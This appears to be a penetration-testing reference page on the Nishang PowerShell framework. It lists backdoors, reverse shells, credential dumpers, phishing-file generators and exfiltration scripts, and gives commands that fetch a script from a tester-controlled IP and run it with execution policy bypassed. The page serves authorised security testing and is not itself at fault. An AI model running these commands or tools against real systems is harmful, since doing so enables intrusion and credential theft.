# Nishang

Nishang is a framework and collection of scripts and payloads that enables the use of PowerShell for offensive security, penetration testing and red teaming. Nishang is useful during all phases of a penetration test.

**Link**: <https://github.com/samratashok/nishang>

Also installed by default on Kali:

```
root@kali:~# ls -l /usr/share/nishang/ 
total 48 
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Antak-WebShell 
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Backdoors 
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Escalation 
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Execution 
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Gather 
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Misc 
-rw-r--r-- 1 root root  495 Jun  4 11:14 nishang.psm1 
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Pivot 
drwxr-xr-x 2 root root 4096 Jun  4 11:15 powerpreter 
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Prasadhak 
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Scan 
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Utility 
```

Transfer the Nishang script to the target machine, here by fetching it from a web server hosted by the tester (10.10.14.14). `iwr` needs a URI scheme, and without `-OutFile` it only reads the response into memory rather than writing a file:

`powershell iwr -uri http://10.10.14.14/{Nishang script} -OutFile {Nishang script}`

Run the script, bypassing the execution policy:

`powershell.exe -ExecutionPolicy Bypass -NonInteractive -File script.ps1`

## Scripts

Nishang currently contains the following scripts and payloads.

### ActiveDirectory

* [Get-Unconstrained](https://github.com/samratashok/nishang/blob/master/ActiveDirectory/Get-Unconstrained.ps1) – Find computers in Active Directory which have Kerberos Unconstrained Delegation enabled.

### Antak – the Webshell

* [Antak](https://github.com/samratashok/nishang/tree/master/Antak-WebShell) – Execute PowerShell scripts in memory, run commands, and download and upload files using this webshell.

### Backdoors

* [HTTP-Backdoor](https://github.com/samratashok/nishang/blob/master/Backdoors/HTTP-Backdoor.ps1) – A backdoor which can receive instructions from third-party websites and execute PowerShell scripts in memory.
* [DNS\_TXT\_Pwnage](https://github.com/samratashok/nishang/blob/master/Backdoors/DNS_TXT_Pwnage.ps1) – A backdoor which can receive commands and PowerShell scripts from DNS TXT queries, execute them on a target, and be remotely controlled using the queries.
* [Execute-OnTime](https://github.com/samratashok/nishang/blob/master/Backdoors/Execute-OnTime.ps1) – A backdoor which can execute PowerShell scripts at a given time on a target.
* [Gupt-Backdoor](https://github.com/samratashok/nishang/blob/master/Backdoors/Gupt-Backdoor.ps1) – A backdoor which can receive commands and scripts from a WLAN SSID without connecting to it.
* [Add-ScrnSaveBackdoor](https://github.com/samratashok/nishang/blob/master/Backdoors/Add-ScrnSaveBackdoor.ps1) – A backdoor which can use the Windows screen saver for remote command and script execution.
* [Invoke-ADSBackdoor](https://github.com/samratashok/nishang/blob/master/Backdoors/Invoke-ADSBackdoor.ps1) – A backdoor which can use alternate data streams and the Windows Registry to achieve persistence.
* [Add-RegBackdoor](https://github.com/samratashok/nishang/blob/master/Backdoors/Add-RegBackdoor.ps1) – A backdoor which uses the well-known Debugger trick to execute a payload via Sticky Keys and Utilman (Windows key + U).
* [Set-RemoteWMI](https://github.com/samratashok/nishang/blob/master/Backdoors/Set-RemoteWMI.ps1) – Modify permissions of DCOM and WMI namespaces to allow access to a non-admin user.
* [Set-RemotePSRemoting](https://github.com/samratashok/nishang/blob/master/Backdoors/Set-RemotePSRemoting.ps1) – Modify permissions of PowerShell remoting to allow access to a non-admin user.

### Bypass

* [Invoke-AmsiBypass](https://github.com/samratashok/nishang/blob/master/Bypass/Invoke-AmsiBypass.ps1) – Implementation of publicly known methods to bypass/avoid AMSI.

### Client

* [Out-CHM](https://github.com/samratashok/nishang/blob/master/Client/Out-CHM.ps1) – Create infected CHM files which can execute PowerShell commands and scripts.
* [Out-Word](https://github.com/samratashok/nishang/blob/master/Client/Out-Word.ps1) – Create Word files and infect existing ones to run PowerShell commands and scripts.
* [Out-Excel](https://github.com/samratashok/nishang/blob/master/Client/Out-Excel.ps1) – Create Excel files and infect existing ones to run PowerShell commands and scripts.
* [Out-HTA](https://github.com/samratashok/nishang/blob/master/Client/Out-HTA.ps1) – Create an HTA file which can be deployed on a web server and used in phishing campaigns.
* [Out-Java](https://github.com/samratashok/nishang/blob/master/Client/Out-Java.ps1) – Create signed JAR files which can be used with applets for script and command execution.
* [Out-Shortcut](https://github.com/samratashok/nishang/blob/master/Client/Out-Shortcut.ps1) – Create shortcut files capable of executing PowerShell commands and scripts.
* [Out-WebQuery](https://github.com/samratashok/nishang/blob/master/Client/Out-WebQuery.ps1) – Create IQY files for phishing credentials and SMB hashes.
* [Out-JS](https://github.com/samratashok/nishang/blob/master/Client/Out-JS.ps1) – Create JS files capable of executing PowerShell commands and scripts.
* [Out-SCT](https://github.com/samratashok/nishang/blob/master/Client/Out-SCT.ps1) – Create SCT files capable of executing PowerShell commands and scripts.
* [Out-SCF](https://github.com/samratashok/nishang/blob/master/Client/Out-SCF.ps1) – Create an SCF file which can be used for capturing NTLM hash challenges.

### Escalation

* [Enable-DuplicateToken](https://github.com/samratashok/nishang/blob/master/Escalation/Enable-DuplicateToken.ps1) – When SYSTEM privileges are required.
* [Remove-Update](https://github.com/samratashok/nishang/blob/master/Escalation/Remove-Update.ps1) – Introduce vulnerabilities by removing patches.
* [Invoke-PsUACme](https://github.com/samratashok/nishang/blob/master/Escalation/Invoke-PsUACme.ps1) – Bypass UAC.

### Execution

* [Download-Execute-PS](https://github.com/samratashok/nishang/blob/master/Execution/Download-Execute-PS.ps1) – Download and execute a PowerShell script in memory.
* [Download\_Execute](https://github.com/samratashok/nishang/blob/master/Execution/Download_Execute.ps1) – Download an executable in text format, convert it back to an executable, and execute it.
* [Execute-Command-MSSQL](https://github.com/samratashok/nishang/blob/master/Execution/Execute-Command-MSSQL.ps1) – Run PowerShell commands, native commands, or SQL commands on an MSSQL Server with sufficient privileges.
* [Execute-DNSTXT-Code](https://github.com/samratashok/nishang/blob/master/Execution/Execute-DNSTXT-Code.ps1) – Execute shellcode in memory using DNS TXT queries.
* [Out-RundllCommand](https://github.com/samratashok/nishang/blob/master/Execution/Out-RundllCommand.ps1) – Execute PowerShell commands and scripts or a reverse PowerShell session using rundll32.exe.

### Gather

* [Check-VM](https://github.com/samratashok/nishang/blob/master/Gather/Check-VM.ps1) – Check for a virtual machine.
* [Copy-VSS](https://github.com/samratashok/nishang/blob/master/Gather/Copy-VSS.ps1) – Copy the SAM file using the Volume Shadow Copy Service.
* [Invoke-CredentialsPhish](https://github.com/samratashok/nishang/blob/master/Gather/Credentials.ps1) – Trick a user into giving credentials in plain text.
* [FireBuster](https://github.com/samratashok/nishang/blob/master/Gather/FireBuster.ps1) / [FireListener](https://github.com/samratashok/nishang/blob/master/Gather/FireListener.ps1) – A pair of scripts for egress testing.
* [Get-Information](https://github.com/samratashok/nishang/blob/master/Gather/Get-Information.ps1) – Get juicy information from a target.
* [Get-LSASecret](https://github.com/samratashok/nishang/blob/master/Gather/Get-LSASecret.ps1) – Get LSA secrets from a target.
* [Get-PassHashes](https://github.com/samratashok/nishang/blob/master/Gather/Get-PassHashes.ps1) – Get password hashes from a target.
* [Get-WLAN-Keys](https://github.com/samratashok/nishang/blob/master/Gather/Get-WLAN-Keys.ps1) – Get WLAN keys in plain text from a target.
* [Keylogger](https://github.com/samratashok/nishang/blob/master/Gather/Keylogger.ps1) – Log keystrokes from a target.
* [Invoke-MimikatzWdigestDowngrade](https://github.com/samratashok/nishang/blob/master/Gather/Invoke-MimikatzWDigestDowngrade.ps1) – Dump user passwords in plain text on Windows 8.1 and Server 2012.
* [Get-PassHints](https://github.com/samratashok/nishang/blob/master/Gather/Get-PassHints.ps1) – Get password hints of Windows users from a target.
* [Show-TargetScreen](https://github.com/samratashok/nishang/blob/master/Gather/Show-TargetScreen.ps1) – Connect back and stream the target screen using MJPEG.
* [Invoke-Mimikatz](https://github.com/samratashok/nishang/blob/master/Gather/Invoke-Mimikatz.ps1) – Load mimikatz in memory. Updated and with some customisation.
* [Invoke-Mimikittenz](https://github.com/samratashok/nishang/blob/master/Gather/Invoke-Mimikittenz.ps1) – Extract juicy information from the memory of target processes (such as browsers) using regex.
* [Invoke-SSIDExfil](https://github.com/samratashok/nishang/blob/master/Gather/Invoke-SSIDExfil.ps1) – Exfiltrate information, such as user credentials, using a WLAN SSID.
* [Invoke-SessionGopher](https://github.com/samratashok/nishang/blob/master/Gather/Invoke-SessionGopher.ps1) – Identify admin jump-boxes and/or computers used to access Unix machines.

### MITM

* [Invoke-Interceptor](https://github.com/samratashok/nishang/blob/master/MITM/Invoke-Interceptor.ps1) – A local HTTPS proxy for MITM attacks.

### Pivot

* [Create-MultipleSessions](https://github.com/samratashok/nishang/blob/master/Pivot/Create-MultipleSessions.ps1) – Check credentials on multiple computers and create PSSessions.
* [Run-EXEonRemote](https://github.com/samratashok/nishang/blob/master/Pivot/Run-EXEonRemote.ps1) – Copy and execute an executable on multiple machines.
* [Invoke-NetworkRelay](https://github.com/samratashok/nishang/blob/master/Pivot/Invoke-NetworkRelay.ps1) – Create network relays between computers.

### Prasadhak

* [Prasadhak](https://github.com/samratashok/nishang/blob/master/Prasadhak/Prasadhak.ps1) – Check the hashes of running processes against the VirusTotal database.

### Scan

* [Brute-Force](https://github.com/samratashok/nishang/blob/master/Scan/Brute-Force.ps1) – Brute force FTP, Active Directory, MSSQL, and SharePoint.
* [Port-Scan](https://github.com/samratashok/nishang/blob/master/Scan/Port-Scan.ps1) – A handy port scanner.

### Powerpreter

* [Powerpreter](https://github.com/samratashok/nishang/tree/master/powerpreter) – All the functionality of Nishang in a single script module.

### Shells

* [Invoke-PsGcat](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PsGcat.ps1) – Send commands and scripts to a specified Gmail account to be executed by Invoke-PsGcatAgent.
* [Invoke-PsGcatAgent](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PsGcatAgent.ps1) – Execute commands and scripts sent by Invoke-PsGcat.
* [Invoke-PowerShellTcp](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1) – An interactive PowerShell reverse connect or bind shell.
* [Invoke-PowerShellTcpOneLine](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcpOneLine.ps1) – Stripped-down version of Invoke-PowerShellTcp. Also contains a skeleton version which could fit in two tweets.
* [Invoke-PowerShellTcpOneLineBind](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcpOneLineBind.ps1) – Bind version of Invoke-PowerShellTcpOneLine.
* [Invoke-PowerShellUdp](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellUdp.ps1) – An interactive PowerShell reverse connect or bind shell over UDP.
* [Invoke-PowerShellUdpOneLine](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellUdpOneLine.ps1) – Stripped-down version of Invoke-PowerShellUdp.
* [Invoke-PoshRatHttps](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PoshRatHttps.ps1) – Reverse interactive PowerShell over HTTPS.
* [Invoke-PoshRatHttp](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PoshRatHttp.ps1) – Reverse interactive PowerShell over HTTP.
* [Remove-PoshRat](https://github.com/samratashok/nishang/blob/master/Shells/Remove-PoshRat.ps1) – Clean the system after using Invoke-PoshRatHttps.
* [Invoke-PowerShellWmi](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellWmi.ps1) – Interactive PowerShell using WMI.
* [Invoke-PowerShellIcmp](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellIcmp.ps1) – An interactive PowerShell reverse shell over ICMP.
* [Invoke-JSRatRundll](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-JSRatRundll.ps1) – An interactive PowerShell reverse shell over HTTP using rundll32.exe.
* [Invoke-JSRatRegsvr](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-JSRatRegsvr.ps1) – An interactive PowerShell reverse shell over HTTP using regsvr32.exe.

### Utility

* [Add-Exfiltration](https://github.com/samratashok/nishang/blob/master/Utility/Add-Exfiltration.ps1) – Add data exfiltration capability to Gmail, Pastebin, a web server, and DNS to any script.
* [Add-Persistence](https://github.com/samratashok/nishang/blob/master/Utility/Add-Persistence.ps1) – Add reboot persistence capability to a script.
* [Remove-Persistence](https://github.com/samratashok/nishang/blob/master/Utility/Remove-Persistence.ps1) – Remove persistence added by the Add-Persistence script.
* [Do-Exfiltration](https://github.com/samratashok/nishang/blob/master/Utility/Do-Exfiltration.ps1) – Pipe (|) this to any script to exfiltrate the output.
* [Download](https://github.com/samratashok/nishang/blob/master/Utility/Download.ps1) – Transfer a file to the target.
* [Parse\_Keys](https://github.com/samratashok/nishang/blob/master/Utility/Parse_Keys.ps1) – Parse keys logged by the keylogger.
* [Invoke-Encode](https://github.com/samratashok/nishang/blob/master/Utility/Invoke-Encode.ps1) – Encode and compress a script or string.
* [Invoke-Decode](https://github.com/samratashok/nishang/blob/master/Utility/Invoke-Decode.ps1) – Decode and decompress a script or string from Invoke-Encode.
* [Start-CaptureServer](https://github.com/samratashok/nishang/blob/master/Utility/Start-CaptureServer.ps1) – Run a web server which logs Basic authentication and SMB hashes.
* [ConvertTo-ROT13](https://github.com/samratashok/nishang/blob/master/Utility/ConvertTo-ROT13.ps1) – Encode a string to ROT13 or decode a ROT13 string.
* [Out-DnsTxt](https://github.com/samratashok/nishang/blob/master/Utility/Out-DnsTxt.ps1) – Generate DNS TXT records which could be used with other scripts.
